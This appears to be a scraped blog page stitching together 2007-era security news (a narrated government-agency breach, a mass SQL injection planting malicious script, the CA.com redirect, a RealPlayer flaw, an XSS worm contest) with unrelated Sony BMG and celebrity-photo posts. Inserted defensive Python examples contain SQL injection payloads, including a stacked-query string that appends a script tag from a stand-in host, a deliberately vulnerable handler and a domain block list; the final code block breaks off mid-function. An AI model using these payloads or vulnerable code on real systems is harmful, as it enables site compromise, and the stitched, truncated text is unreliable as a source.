Grossman stressed that vulnerable Flash animations will remain on the Web for some time, as Web developers first have to patch their authoring tools, then create new Flash files and upload those files to their sites. In many cases, a third-party developer maintains the Web site, which will increase delays, he said.

Posted in | 0 comments

Anatomy of a hack attack

With the help of security experts, we reconstruct a typical hack attack on two large organisations and walk through the steps that the head of IT should follow in such a case.

Monday, 9am
Blackjack, a hacker working from an internet cafe in London, is about to launch an attack on a major government agency. His aim is to cause maximum disruption and embarrassment. And, according to security experts, his job is going to be worryingly easy.

"Most organisations have dozens of vulnerabilities they haven't patched, or aren't even aware of," said Toralv Dirro, a security strategist with McAfee. "Even if a penetration-testing service says you're not vulnerable, that only means they haven't found a vulnerability, not that one doesn't exist."

Blackjack has spent weeks researching his target, identifying names of employees, partners and current projects. He has identified a potential way into the network through People Inc, a staffing agency that provides temporary workers to the public sector and which has direct links to the government agency's website and HR database.


Using basic lookups such as ARIN and InterNIC whois records, Blackjack is able to identify the IP addresses of People Inc's web server and database server, and knows what applications are running. Using a range of scanning tools, he also maps how traffic flows on the company's network and which ports are open, so he can connect to them without being detected. Finally, he uses a simple SQL injection or cross-site scripting technique to gain access to the web server.

This is a relatively common and simple hacking technique, explained Rhodri Davies, a technical architect with security specialist Firestorm. "Basically, the attacker uses the existing interface but, rather than entering information, they write a command for the back-end database," he said. "For example, rather than entering a username, you command the database to send back a list of usernames and passwords."

Monday, 12pm
By lunchtime, the hacker has gained access to People Inc's web server, and he is able to access usernames and passwords which will gain him full network access. At this stage, there's a good chance People Inc won't even notice that its systems have been compromised, added Lee Dawson, a penetration tester with ethical hacking company dns. "Most corporates spend money on firewalls and intrusion-detection systems but they don't do anything to prevent web attacks," he said. "Very few have application layer gateways, so attacks on websites are very easy to miss."

With full network access, Blackjack is able to easily identify the connection to the government agency and quickly access the server that runs its payment website. Within minutes, he has identified an open port and used it to access the payment server, where he runs a malicious script to trick the server into revealing the usernames, passwords and payment histories of thousands of users.

Monday, 3pm
The government agency has more sophisticated firewalls and intrusion-detection systems than People Inc, and the IT security team notice a series of odd characters and sequences in requests to the web server, a sign that something is happening. However, it's not immediately apparent that the system has been compromised, and no alerts have yet been triggered. "When you go in as an attacker during a penetration test, it's relatively easy to be undetected, providing you don't start changing or deleting data," said Ravid Zavlinsky, of web-security specialist Applicure. "Many clients we speak to think their sites are impenetrable, [while] we find that they're being accessed every one or two minutes in fact."

Monday, 4pm
The hacker's next step is to create a new administrator account on the server — he knows the likelihood of this account being deleted in future is slim, even if staff don't recognise the name associated with the account. With this account, he copies some data from a database table and deletes a series of security profiles — eventually triggering the government agency's IT security systems.

When the IT manager on duty sees the alert from both the firewall and intrusion-detection system, he realises an attack may be in progress. He immediately asks for copies of any logs that are available, including the web server, database, firewall and intrusion-detection system. These logs should reveal what requests were made to the database and web server, and help to locate any attack scripts. This job should be overseen by a security specialist, as it can be hard to locate scripts created by an experienced hacker.
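The log review described above is where an injection like the one in the walkthrough first becomes visible, and the requests that carried it rarely look like SQL in the raw log. The Python below is an added example, not from the article or the experts it quotes: a triage pass over web-server access logs that URL-decodes each request, expands hex literals of the CAST(0x... AS NVARCHAR) form that automated injection robots commonly use to hide their SQL (an assumption about the payload encoding, not something the article states), and reports which indicators each request trips. The log lines are constructed in Apache combined format, the hidden SQL is a sketch of a catalog walk over sysobjects and syscolumns, and malicious.example is a placeholder host.

```python
"""Triage of web-server access logs for SQL-injection attempts. Added example, not
from the article or the experts it quotes. Log lines are constructed; the hex
expansion follows the CAST(0x... AS NVARCHAR) encoding injection robots commonly use."""
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) ')

# Indicators evaluated against the URL-decoded, hex-expanded request path.
INDICATORS = [
    ("stacked-statement", re.compile(r";\s*(?:declare|exec|execute|update|insert|delete|drop|cast)\b", re.I)),
    ("union-select", re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.I)),
    ("comment-terminator", re.compile(r"(?:'|\)|;)\s*(?:--|/\*)")),
    ("tautology", re.compile(r"'\s*or\s+\S+\s*=\s*\S+", re.I)),
    ("catalog-probe", re.compile(r"\b(?:sysobjects|syscolumns|information_schema)\b", re.I)),
]

# 0x literals of at least four whole bytes; odd-length runs are left alone.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){4,})")


def decode_hex_payloads(text):
    """Expand 0x... literals the way CAST(0x.. AS [N]VARCHAR) would, so the SQL hidden
    inside is visible to the indicators. ASCII is tried first, then UTF-16LE (what
    NVARCHAR carries); anything that is not printable text is left untouched."""
    def expand(m):
        raw = bytes.fromhex(m.group(1))
        for enc in ("ascii", "utf-16-le"):
            try:
                s = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if s.isprintable():
                return s
        return m.group(0)
    return HEX_LITERAL.sub(expand, text)


def parse_line(line):
    """Split one combined-format line; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %xx and '+' so 'DECLARE+%40S' reads as 'DECLARE @S', then expand hex.
    rec["decoded"] = decode_hex_payloads(unquote_plus(rec["path"]))
    return rec


def triage(lines):
    """Return (ip, raw path, [indicator names]) for each request that trips an indicator."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, rx in INDICATORS if rx.search(rec["decoded"])]
        if hits:
            findings.append((rec["ip"], rec["path"], hits))
    return findings


# Constructed sample log. The hidden SQL sketches the catalog walk the mass-hack
# articles describe (sysobjects/syscolumns), hex-encoded as UTF-16LE.
_HIDDEN_SQL = ("DECLARE @T VARCHAR(255),@C VARCHAR(255);DECLARE tc CURSOR FOR "
               "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'")
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jan/2008:10:12:01 +0000] "GET /products.asp?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.8 - - [07/Jan/2008:10:12:02 +0000] "GET /search.asp?q=select+union+rules HTTP/1.1" 200 2210 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [07/Jan/2008:10:12:03 +0000] "GET /products.asp?id=42;DECLARE+@S+NVARCHAR(4000);SET+@S=CAST(0x'
    + _HIDDEN_SQL.encode("utf-16-le").hex() + '+AS+NVARCHAR(4000));EXEC(@S);-- HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.11 - - [07/Jan/2008:10:12:04 +0000] "GET /news.asp?id=1+UNION+SELECT+name,description+FROM+products HTTP/1.1" 500 611 "-" "Mozilla/4.0"',
    "198.51.100.12 - - [07/Jan/2008:10:12:05 +0000] \"GET /login.asp?user=admin'+or+'1'='1&pass=x HTTP/1.1\" 302 0 \"-\" \"Mozilla/4.0\"",
]


if __name__ == "__main__":
    for ip, path, hits in triage(SAMPLE_LOG):
        print(ip, hits, parse_line(next(l for l in SAMPLE_LOG if path in l))["decoded"])
```

Run against real logs, the decoded form is what to read; the raw lines from an automated attack are mostly opaque hex. The indicator list is a starting point to tune per application: a site whose URLs legitimately carry apostrophes or the word "union" needs tighter patterns, and the 200 status on the hex-encoded request in the sample is a reminder that a successful injection does not produce an error to alert on.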


Completing this audit before disconnecting any machine from the network is absolutely vital, according to the experts. "If you panic and simply pull the plug out of the wall, you will lose a good deal of evidence because of volatile memory footprints," said Jose Nazario, senior security researcher with Arbor Networks. "You also lose any track a hacker may have left of what they have accessed or changed, and it makes it much harder to see what they are doing if there are no active processes running."

Moreover, if you don't know what's happened, there is no guarantee the hacker isn't still hiding on the network, observed Brian Chess, chief scientist with security company Fortify Software.

Back at the government agency, the logs reveal that the agency's web server has been compromised and, more seriously, the database server holding web-payment records and user IDs for thousands of citizens has been accessed and some records deleted. The user IDs and passwords of the database administrators have been accessed, and running an anti-rootkit application reveals that a number of rootkits have been installed on the database server.

Monday, 4.30pm
Now that he has a clearer idea of what has been compromised, the head of IT calls the chief information officer, who immediately informs the chief executive of the security breach. The chief information officer also informs the police, who contact the Serious Organised Crime Agency (SOCA), and government security agencies of the attack. "Informing the authorities is often a regulatory requirement, but it's also important to give them the chance to help identify and track down the culprits," said Chess. The chief information officer and the chief executive decide to delay issuing a public statement until there is more information about the security breach itself.

It is important to inform the authorities early on in an attack situation, before all evidence that might trap the hacker is lost, said Chess. "Although it's often a very slight chance that a hacker could be identified and caught, it's important to warn the police before you do anything that tips off the hacker you know about him. It's also important they can come in before the audit trail is lost."

Monday, 5pm
The head of IT meets the chief information officer and IT security specialists to devise a plan of action. The agency has a well-established policy for dealing with security breaches, which means staff are less likely to panic and make poor decisions in a crisis. To ensure that your IT team doesn't panic during the immediate aftermath of an attack, ensure there are written policies detailing the procedure to be followed. "There should be clear rules to guide the team, and rule number one is never unplug the server until you know what you are dealing with," Chess said.

While the action plan is being formulated, the agency uses an automated tool to block the IP address of the hacker. An automated tool is often the best option in this situation, since, as soon as you block a hacker's IP address, he will often switch to another IP address within seconds.

Monday, 5.30pm
One team of IT staff is dispatched to examine the web server, the server is temporarily taken offline, and a "closed for essential maintenance page" is posted on the website. The clean-up team runs a full antivirus and anti-rootkit check on the web server and uses the previous day's backup disk to verify that nothing on the server has been deleted or amended.

The head of IT realises that simply rebooting the system isn't an option, since it would not only compromise evidence but could also prevent the clean-up team from easily seeing what was done while the machine was running.

Auditing the logs and examining the requests made to the server reveals that the hacker exploited a known vulnerability in the server operating system to gain access, and this weakness is patched as soon as the evidence from that server has been preserved.

The clean-up team also ensures that all other patches to the server have been applied, and that there are no other known vulnerabilities that could result in the server being attacked again. It's important not to apply patches or make any system changes until this investigation is complete, said Zavlinsky. "Making untested or ad-hoc changes to an application could just add further vulnerabilities."

This is a real danger if a hacker is determined to target your organisation. "The ultimate goal for many hackers is to take a server offline within minutes of it going back online," added Zavlinsky. "So it is vital not to reboot a server unless you are absolutely confident you know what the problem was and that it has been fixed. Otherwise, you'll be up and down for three days trying to sort it all out."

At the same time, a second team is examining the compromised database server. The database is relatively complex and has links into multiple other agencies and systems. After examining the logs and audits, the investigation team realises the hacker has leveraged a SQL injection and created a false administrator login to the machine. From here, the hacker accessed a number of user IDs and passwords, then moved on to look at financial records and security documents, and deleted some records altogether.

"This isn't a great situation to be in," said Chess. "They've opened the back door but now they've also got a key to the front door as well." The priority is to discover which records have been accessed and to compare the database with the most recent backup to look for changes or deletions. Since it is possible that credit-card and direct-debit details may have been accessed, the chief information officer immediately informs the relevant banks of the potential breach.

Monday, 8pm
A subsequent scan of the server for malware or other scripts shows a number of scripts and programs have been added, including rootkits that could be used to further compromise the network. At this point, the head of IT decides that cleaning up the machine will be too time-consuming, and instead installs a new server in place of the affected machine. "Sometimes that's the best decision to make, because you'll spend weeks sorting out the infected machine and you'll never be sure you've got everything," said Chess.

Monday, 10pm
The next task is to update all the organisation's security patches and run a complete check for malware, viruses or other attack scripts. The firewall and intrusion-detection system are updated, and a team of forensic computing experts arrive from a specialist consultancy to begin checking the logs and audits to see if any other systems have been altered or accessed. This team will be able to spot modifications or potential attack scripts far more easily than a general IT specialist.

Tuesday, 8am
After overnight testing and a comprehensive patch update, the web server goes back online, along with the new database server. Although there seem to be no problems, the systems and all logs are closely monitored for any sign of attack or irregular behaviour. The team are also closely monitoring the internet for any sign that the credit-card numbers accessed have been posted online, or offered for sale.

As an added precaution, all payment facilities are unavailable during the following 24 hours, until the team is certain the new servers are functioning properly and are fully secure.


Tuesday, 8.30am
Once the systems are back online, proceedings in the aftermath of the attack begin. First, the chief information officer meets with the chief executive and other senior government officials to discuss what information was taken, who needs to be notified of the attack and how the organisation might be affected. "This is the point in time where non-IT executives should be actively involved," said Chess. "It's not necessary to wait until the clean-up is finished, but you need to be certain that you have information to give them on these vital questions."

In this case, since the information accessed includes payment records (including credit-card numbers), it is decided that the agency should issue a public statement explaining what information has been accessed and what the potential consequences of this might be. Consumers are instructed that they will be issued with new user IDs and passwords for the website, and banks will cancel and reissue credit cards for consumers affected by the breach.

This seems like a lot of hassle, but security experts argue it's better than trying to bury the bad news. "Telling people the bad news is tricky but, if you want to retain their trust, it makes good sense," said Nazario. "It also makes sense because, if people are aware of the danger, it limits the scope of the damage, by putting them on their guard."

And finally...
Once these initial response steps are completed, the experts said anyone recovering from a hacking attack should:

  • Review the attack with relevant IT staff: what happened; how can we be sure it won't happen again?
  • Ask what vulnerability was exploited and what others might exist that are unknown
  • Audit the IT security systems to see whether you need new firewall/intrusion-detection/antivirus technologies, or whether an application layer security device would prove worthwhile
  • Ensure that your policies and procedures are kept updated, and incorporate any lessons learned from this attack into a policy for future incidents

Posted in | 0 comments

Mass hack infects tens of thousands of sites

Then they serve visitors multiple exploits, including October RealPlayer attack

Tens of thousands of Web sites have been compromised by an automated SQL injection attack, and although some have been cleaned, others continue to serve visitors a malicious script that tries to hijack their PCs using multiple exploits, security experts said this weekend.

Roger Thompson, the chief research officer at Grisoft SRO, pointed out that the hacked sites could be found via a simple Google search for the domain that hosted the malicious JavaScript. On Saturday, said Thompson, the number of sites that had fallen victim to the attack numbered more than 70,000. "This was a pretty good mass hack," said Thompson, in a post to his blog. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared."

Symantec Corp. cited reports by other researchers -- including one identified only as "websmithrob" -- that fingered a SQL vulnerability as the common thread. "The sites [were] hacked by hacking robot by means of a SQL injection attack, which executes an iterative SQL loop [that] finds every normal table in the database by looking in the sysobjects table and then appends every text column with the harmful script," said websmithrob in a blog post. "It's possible that only Microsoft SQL Server databases were hacked with this particular version of the robot since the script relies on the sysobjects table that this database contains."

According to websmithrob, the attack appends a JavaScript tag to every piece of text in the SQL database; the tag instructs any browser that reaches the site to execute the script hosted on the malicious server.
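The injection behaviour described here and in the two earlier items on the same attack (the 70,000-site SQL injection and the uc8010-dot-com redirector) can be modelled end to end. The Python below is an added example, not code from the articles, the researchers they quote or any affected site: a hypothetical page-view logger that splices a request parameter into SQL on a driver that runs stacked statements (as SQL Server does), the bound-parameter version of the same handler, a payload that appends a script tag to text columns, and an incident-response sweep that walks the catalog (sqlite_master and PRAGMA table_info standing in for sysobjects and syscolumns) to find and strip the tag. SQLite stands in for SQL Server, malicious.example is a placeholder rather than the real malicious domain, and every row is constructed.

```python
"""Automated SQL-injection defacement, modelled end to end on SQLite.

Added example; not code from the articles, the researchers they quote or any
affected site. Assumptions: a hypothetical page-view logger concatenates a
request parameter into SQL on a driver that runs stacked statements (as SQL
Server does); sqlite_master / PRAGMA table_info stand in for sysobjects /
syscolumns; malicious.example is a placeholder host; all rows are constructed.
"""
import re
import sqlite3

EVIL_SRC = "http://malicious.example/0.js"  # placeholder, not the real domain

# Matches the injected tag so the sweep can strip it out of column values.
SCRIPT_TAG_RE = re.compile(r'<script\s+src="[^"]*"\s*>\s*</script>', re.IGNORECASE)


def make_db():
    """Constructed sample schema: two content tables and a visit log."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, headline TEXT, body TEXT);
        CREATE TABLE visits (id INTEGER PRIMARY KEY, page TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A useful widget', 9.99);
        INSERT INTO products VALUES (2, 'Gadget', 'A shiny gadget', 19.99);
        INSERT INTO news VALUES (1, 'Site launched', 'Welcome to our site');
    """)
    return conn


def log_visit_vulnerable(conn, page):
    """The bug: the parameter is spliced into the SQL text, so a quote closes the
    literal and a semicolon starts a second, attacker-chosen statement.
    executescript() runs every statement, like a driver that permits stacking."""
    conn.executescript("INSERT INTO visits (page) VALUES ('" + page + "');")


def log_visit_safe(conn, page):
    """The fix: the value is bound as a parameter and is never parsed as SQL."""
    conn.execute("INSERT INTO visits (page) VALUES (?)", (page,))
    conn.commit()


def injection_payload():
    """Stacked-query payload, reduced to two named tables. The real robot looped
    over sysobjects/syscolumns and appended the tag to every text column it found."""
    tag = '<script src="' + EVIL_SRC + '"></script>'
    return ("x'); UPDATE products SET description = description || '" + tag + "'; "
            "UPDATE news SET body = body || '" + tag + "'; "
            "INSERT INTO visits (page) VALUES ('y")


def scan_and_clean(conn):
    """Incident-response sweep: walk every user table and text column and strip the
    injected tag. Returns {(table, column): rows_cleaned}. Identifiers come from the
    catalog, not from user input, so quoting them into the statement is safe here."""
    cleaned = {}
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        text_cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')
                     if r[2].upper() in ("TEXT", "CHAR", "VARCHAR", "NVARCHAR")]
        for col in text_cols:
            rows = conn.execute(
                f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                ("%<script%",)).fetchall()
            for rowid, value in rows:
                fixed = SCRIPT_TAG_RE.sub("", value)
                if fixed != value:
                    conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                                 (fixed, rowid))
                    cleaned[(table, col)] = cleaned.get((table, col), 0) + 1
    conn.commit()
    return cleaned


def demo():
    """Infect through the vulnerable handler, sweep, then show the safe handler is inert."""
    conn = make_db()
    log_visit_vulnerable(conn, injection_payload())
    infected = conn.execute("SELECT description FROM products WHERE id = 1").fetchone()[0]
    report = scan_and_clean(conn)
    after = conn.execute("SELECT description FROM products WHERE id = 1").fetchone()[0]
    conn2 = make_db()
    log_visit_safe(conn2, injection_payload())  # stored as an inert string only
    untouched = conn2.execute("SELECT description FROM products WHERE id = 1").fetchone()[0]
    return infected, report, after, untouched


if __name__ == "__main__":
    print(demo())
```

Two things the sweep illustrates that the articles' cleanup reports leave implicit: the catalog walk that found every text column for the attacker is exactly the walk a responder needs to find every injected row, and stripping the tag is not a fix, because the concatenating handler will take the next payload unchanged until it is replaced by the bound-parameter version.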

Hacked sites included both .edu and .gov domains, the SANS Institute's Internet Storm Center (ISC) reported in a warning posted last Friday. The ISC also reported that several pages of security vendor CA Inc.'s Web site had been infected.

Grisoft's Thompson said that his research had identified a 15-month-old vulnerability as one of those exploited by the attack code. The exploit, he said, targeted the MDAC (Microsoft Data Access Components) bug patched in April 2006 with the MS06-014 security update. "They went to the trouble of preparing a good Web site exploit, and a good mass hack but then used a moldy old client exploit. It's almost a dichotomy," said Thompson.

Other researchers, including websmithrob and Symantec, said that the JavaScript also launched an exploit targeting a much more recent vulnerability: a RealPlayer bug that first surfaced last October. The flaw was fixed several days later by RealNetworks Inc.

Another surprise, Thompson said, was the speed of the hack's cleanup. Although a Google search still showed thousands of sites infected with the script on Saturday, Thompson claimed that Grisoft's LinkScanner Pro tool indicated that nearly all had actually been scrubbed. "I found that really surprising [that they were cleaned so quickly]," he said in an interview via instant messaging on Sunday. "They're all so disparate. If it was a big server farm, I could understand it being cleaned so quickly, but there doesn't seem to be anything common about them all."

The ISC updated its alert Sunday, saying another round of SQL injection attacks had infected sites with a script referring to a different malicious server. When asked to examine the second domain, Thompson confirmed that it was serving up the same malicious JavaScript as the first. However, many of those sites -- which as of this morning numbered more than 93,000, according to a quick Google search -- had not been cleaned.

"It looks like a bunch of these are still carrying the references to [the malicious domain] but not infectively," said Thompson. "In other words, they're still hacked, but the injection hasn't worked properly."

Microsoft was not immediately available for comment on the attack, which targeted sites backed by its SQL Server database.

Posted in | 0 comments

Sony BMG to drop copy protection for downloads

NEW YORK (Reuters) - Sony BMG Music Entertainment, the world's second largest music company, will this month become the last of the big four majors to drop copy protection software on music downloads, also known as digital rights management (DRM).

Sony BMG, home to artists including Beyonce, Britney Spears and Celine Dion, said on Monday it will launch a gift card service on January 15 called Platinum MusicPass that will feature digital albums from its artists in the MP3 format. The format does not use DRM protection.

Fans will be able to buy the digital album cards in stores and download full-length albums from a MusicPass Web site after they type in an identifying number. The cards will be available at U.S. retail outlets such as Best Buy and Target.

"The introduction of MusicPass is an important part of Sony BMG's ongoing campaign to bring its artists' music to fans in new and innovative ways, and to develop compelling new business models," said Thomas Hesse, Sony BMG president, global digital business & U.S. Sales.

The music industry posted a 15 percent drop in album sales in 2007 as fans bought fewer CDs. Digital music sales did not make up for the revenue shortfall, forcing executives to explore new business models and ways of attracting consumers.

One of the biggest issues for music companies last year was whether dropping DRM would help drive digital sales.

In February, Apple Inc founder Steve Jobs called on music companies to stop requiring retailers to use DRM for services like his company's iTunes Music Store. Jobs said dropping DRM would help boost sales.

Digital music buyers have been frustrated by the limitations imposed by DRM, prompting industry analysts to support the call to drop copy protection. Music companies had required DRM to prevent users from making multiple copies or sharing songs with friends for free.

EMI, the number four music company by market share, became the first major to drop DRM in April and was later followed by Vivendi's Universal Music Group. Last month, Warner Music Group said it would start selling its music in MP3 format through Amazon.com.


RealPlayer flaw raises security flags

Security experts are warning users to be vigilant after the disclosure of a new security vulnerability in RealPlayer.

The flaw could allow an attacker to remotely execute code on a victim's machine.

Security researcher Evgeny Legerov originally posted the vulnerability on New Year's Day, but did not specify the exact nature of the flaw.

Secunia reported in an advisory that the problem is in fact a buffer overflow error. If exploited, the error could cause an application crash, which would give an attacker the ability to execute code.

Buffer overflow errors are often used by attackers to install malware. Secunia advises users to avoid opening untrusted files or visiting suspicious websites.

Security firm SANS Institute also urged users to avoid suspicious files and sites, and recommended that system administrators block access to a pair of domains that have shown a history of exploiting RealPlayer flaws.


Manny Pacquiao Scandal

Here are the controversial pictures of Pacman circulating from his partying at the Embassy Club in Taguig.

You be the judge.

[Images: manny1.jpg, manny2.jpg, manny3.jpg, manny4.jpg, manny5.jpg, manny6.jpg, manny7.jpg]


Malware Writers Hack CA's Site

The security vendor has fixed the damage, but the site briefly redirected visitors to a malicious site in China.

Part of security software vendor CA's Web site was hacked earlier this week and was redirecting visitors to a malicious Web site hosted in China.

Although the problem now appears to have been corrected, cached versions of some pages in the press section of CA.com show that earlier this week the site had been redirecting visitors to the uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of the SANS Internet Storm Center.

The hack is similar to last year's attack on the Dolphin Stadium Web site, which infected visitors looking for information on the Super Bowl football game, Sachs said. "It's exactly the same setup," he said. "It's JavaScript that they've managed to insert into the title or the body of the HTML."

CA itself may not even host the press release section of its site, as that job is often outsourced to a third party, Sachs said. Often a misconfigured application server or a Web or database programming error can give hackers all the opening they need to insert their malicious code.

"When you outsource, you've got to be just as (demanding) about security as you are with your own site," Sachs said.

CA representatives could not be reached immediately for comment.

The uc8010.com domain serves attack code that exploits a recently patched vulnerability in the RealPlayer multimedia software, Sachs said.

The criminals behind this domain have hacked tens of thousands of Web pages and inserted code that redirects visitors to the malicious server, he added.

SANS has posted a note on the uc8010.com issue and recommends that IT staff block access to the domain. Sachs said another domain, ucmal.com -- also hosted in China -- should also be blocked because it is associated with a similar type of attack.
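The mass SQL injection report above describes pages that still carry the reference to the malicious domain "but not infectively", and the CA.com story describes script inserted into the title or body of the HTML. As an added, defender-side illustration (this is not code from the page, from SANS or from the ISC), the Python below parses a page, lists every `<script src>` that loads from a block-listed domain, and separately flags pages that mention such a domain without any script element actually loading from it. The block list is the two domains named in the article; the sample pages are constructed for the example.

```python
import re
from html.parser import HTMLParser

# The two attack-serving domains named in the articles above.
BLOCKED_DOMAINS = {"uc8010.com", "ucmal.com"}


class _ScriptSrcCollector(HTMLParser):
    """Record the src attribute of every <script> start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.script_srcs.append(value)


def host_of(url):
    """Host part of an absolute or scheme-relative URL, lowercased ('' if none)."""
    m = re.match(r"^\s*(?:https?:)?//([^/:?#]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def is_blocked(host):
    """True for a block-listed domain or any subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def scan_html(page):
    """Classify one HTML document.

    Returns (status, hosts):
      "active"  - a parseable <script src> loads from a blocked host
      "remnant" - a blocked domain appears in the page, but no script element
                  loads from it (injected text that never became live script)
      "clean"   - neither
    """
    collector = _ScriptSrcCollector()
    collector.feed(page)
    collector.close()
    active = sorted({host_of(s) for s in collector.script_srcs if is_blocked(host_of(s))})
    if active:
        return "active", active
    lowered = page.lower()
    remnant = sorted(d for d in BLOCKED_DOMAINS if d in lowered)
    if remnant:
        return "remnant", remnant
    return "clean", []


# Constructed sample pages (not captured from any real site).
SAMPLE_PAGES = {
    "live_injection": (
        '<html><head><title>Press releases</title></head><body>'
        '<h1>News</h1><script src="http://uc8010.com/0.js"></script></body></html>'
    ),
    "subdomain_injection": (
        '<html><body><p>Welcome</p><SCRIPT SRC=//www.ucmal.com/1.js></SCRIPT></body></html>'
    ),
    "broken_injection": (
        # The injected string landed inside an attribute and was entity-encoded by
        # the site's template, so the browser shows it as text and never loads it.
        '<html><body><input name="q" value="&lt;script src=http://uc8010.com/0.js&gt;'
        '&lt;/script&gt;"></body></html>'
    ),
    "untouched": (
        '<html><body><script src="https://cdn.example.net/site.js"></script></body></html>'
    ),
}


def scan_samples():
    """Run every constructed sample through scan_html; returns name -> status."""
    return {name: scan_html(page)[0] for name, page in SAMPLE_PAGES.items()}


if __name__ == "__main__":
    for name, page in SAMPLE_PAGES.items():
        status, hosts = scan_html(page)
        print(f"{name:20s} {status:8s} {' '.join(hosts)}")
```

Run against a crawl of your own pages (or against the text columns of the database that feeds them), the "remnant" class is the one worth a second look: those rows were written to by the injection even though nothing is being served from them yet, so the underlying hole is still open.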


State Web sites back after hack attack

HARRISBURG - The official Pennsylvania Web site and the Web pages of several state agencies were taken offline Friday after hackers in China infiltrated them. But state officials said they don't believe any sensitive information was compromised.

The Rendell administration learned about 10 a.m. that a virus had infected the Internet site. Agencies affected by the attack were the departments of Education, Labor and Industry, and Military and Veterans Affairs, as well as the Pennsylvania Lottery.

The hackers detected a vulnerability in a media player package and used that to get into the system, said Mia DeVane, a spokeswoman for the Office of Administration. ''When there's a hack, they get in through a back door,'' she said.

DeVane said the state needed to take down the sites ''to make sure a virus couldn't spread.''

Information technology employees located the source of the attack, she said. ''Our IT security experts…looked at the network domain, which came out of China.''

Officials found no damage to personal computers and were continuing to investigate, DeVane said. ''At this point, we believe our anti-virus software prevented any PCs from being taken over,'' she said.

By late afternoon Friday, access to several state sites had been restored. But before that, visitors to the official state Web site (www.state.pa.us) received this message: ''The Commonwealth of Pennsylvania Web site that you are trying to reach is either not available or is undergoing maintenance. Please try back later. Thank you for your patience.''

DeVane said state Web sites unaffected by the attack also were taken down as a precaution. They included the Department of Agriculture, which provides information on the annual Pennsylvania Farm Show that starts today.

DeVane said the state routinely fends off such attacks. In October, state officials were recognized by a national IT officers' group for their computer security efforts.

''This is something that we fight every day,'' DeVane said. ''Viruses are a constant issue. We fight them off every day, and it's successful.''

The hacker attack appeared limited to executive branch sites only. Web sites maintained by the Legislature were not affected, said representatives of all four caucuses.

The Associated Press contributed to this story.


Contest seeks the most diminutive XSS worm

Think you have a gift for writing compact code that replicates using one of the web's most vexing classes of security vulnerabilities? Then security researcher RSnake (aka Robert Hansen) would like to hear from you. He has set up a contest to see who can write a self-propagating cross-site scripting (XSS) worm using the fewest characters.

XSS bugs are the bane of web and application programmers alike because they allow attackers to steal email, bank account credentials and other sensitive information by injecting malicious code into trusted websites. Worse yet, such vulnerabilities can be turned into self-propagating worms that use a victim's browser to multiply the damage. Over the past few years, some of the biggest web destinations - MySpace, Yahoo and Google's Orkut among them - have been overrun by the pest.

RSnake, a researcher who focuses on website security, has seen plenty of XSS worms. But he says he wants to see more still, particularly those that are boiled down to their essence, so that he and other security pros can better defend against them.

"Understanding the tools that hackers use for generic worm propagation is the foundation for writing tools to prevent that exact thing," he said in an instant message. "We have lots of examples of real life worm code, but the problem is it's almost always obfuscated, it has site specific code in it and it contains a payload. The only way to distill it is to ask people to make it as short as possible."

The best-known self-propagating XSS exploit to date was dubbed the Samy Worm by its creator, Samy Kamkar. In late 2005, the exploit needed less than a day to add more than 1 million MySpace users to Kamkar's MySpace profile and eventually caused News Corp. to temporarily shut down the social networking site. While the worm wasn't malicious, it alerted the world to the power that could be wielded from a modest amount of code that piggybacked off a high-traffic website.

More destructive was the JS-Yamanner worm, which in 2006 harvested email addresses by exploiting a vulnerability in Yahoo's web mail service.

There are no real prizes to be doled out in the Diminutive XSS Worm Replication Contest except for bragging rights and the satisfaction that comes from knowing you're helping push the boundaries of what's currently understood about the pest.

"If you pay attention there are really only two techniques, but tons of variants on those two techniques," RSnake says of XSS worms. The idea is to see as many different worms as possible so he and other researchers can better grasp common threads in them all.

Entries aren't to include the payloads themselves, only the mechanism that makes the code replicate. The exploits have to work in either the Internet Explorer browser version 7.0 or Firefox 2.x.

So far, a contestant by the handle of digi7al64 is the current winner, having submitted an XSS worm with just 292 characters. The final winner will be announced on Jan. 10.
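The CA.com story above puts the blame on "a Web or database programming error", and the XSS contest is about script that runs in a visitor's browser once it is in a page. Two defects cover both: SQL built by string concatenation (how script gets written into a database in the first place) and rendering stored text without escaping (how it then executes). The Python below is an added example, not code from the page or from any of the projects it mentions; it uses an in-memory sqlite3 table with constructed rows to show the broken and fixed version of each, and the injected body text with its `uc8010.com` reference is constructed to mirror what the articles describe.

```python
import html
import sqlite3

# A constructed row of the kind the mass injection left behind: legitimate text
# with a script reference appended (domain as named in the articles above).
INJECTED_BODY = 'Not for publication.<script src="http://uc8010.com/0.js"></script>'


def make_db():
    """In-memory article table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
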